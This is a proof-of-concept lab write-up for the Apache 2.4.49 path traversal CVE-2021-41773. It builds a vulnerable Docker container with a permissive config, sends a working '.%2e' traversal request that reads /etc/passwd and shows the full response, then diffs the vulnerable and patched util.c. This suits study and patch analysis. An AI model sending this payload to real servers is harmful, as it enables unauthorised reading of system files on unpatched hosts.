CVE-2021-41773 POC with Docker
To customize the httpd.conf
file, change line 251
in the <Directory />
section from Require all denied
to Require all granted
.
<Directory />
AllowOverride none
Require all granted
</Directory>
FROM httpd:2.4.49
COPY ./httpd.conf /usr/local/apache2/conf/httpd.conf
Then, run the commands to build and run the Docker image:
$ docker build -t apache-pt .
$ docker run -dit --name apache-pt-app -p 81:80 apache-pt
Send the following request using BurpSuite Repeater.
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1
Host: localhost:81
User-Agent: Mozilla
Connection: close
Response:
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 02:32:09 GMT
Server: Apache/2.4.49 (Unix)
Last-Modified: Mon, 27 Sep 2021 00:00:00 GMT
ETag: "39e-5cceec7356000"
Accept-Ranges: bytes
Content-Length: 926
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
The source code for Apache 2.4.49 (vulnerable) and Apache 2.4.50 (patched) can be downloaded respectively from:
- https://dlcdn.apache.org//httpd/httpd-2.4.49.tar.gz
- https://dlcdn.apache.org//httpd/httpd-2.4.50.tar.gz
$ wget https://dlcdn.apache.org//httpd/httpd-2.4.49.tar.gz
$ wget https://dlcdn.apache.org//httpd/httpd-2.4.50.tar.gz
The vulnerability is found in the /server/util.c
file at line 571
where validation is applied for payloads of type /xx/../
but not for /xx/.%2e/
.
The difference between the vulnerable code and the patched code can be obtained with the command diff.
$ diff httpd-2.4.49/server/util.c httpd-2.4.50/server/util.c
505c505,506
< apr_size_t l = 1, w = 1;
---
> apr_size_t l = 1, w = 1, n;
> int decode_unreserved = (flags & AP_NORMALIZE_DECODE_UNRESERVED) != 0;
532c533
< if ((flags & AP_NORMALIZE_DECODE_UNRESERVED)
---
> if (decode_unreserved
570,571c571,581
< /* Remove /xx/../ segments */
< if (path[l + 1] == '.' && IS_SLASH_OR_NUL(path[l + 2])) {
---
> /* Remove /xx/../ segments (or /xx/.%2e/ when
> * AP_NORMALIZE_DECODE_UNRESERVED is set since we
> * decoded only the first dot above).
> */
> n = l + 1;
> if ((path[n] == '.' || (decode_unreserved
> && path[n] == '%'
> && path[++n] == '2'
> && (path[++n] == 'e'
> || path[n] == 'E')))
> && IS_SLASH_OR_NUL(path[n + 1])) {
588c598
< l += 2;
---
> l = n + 1;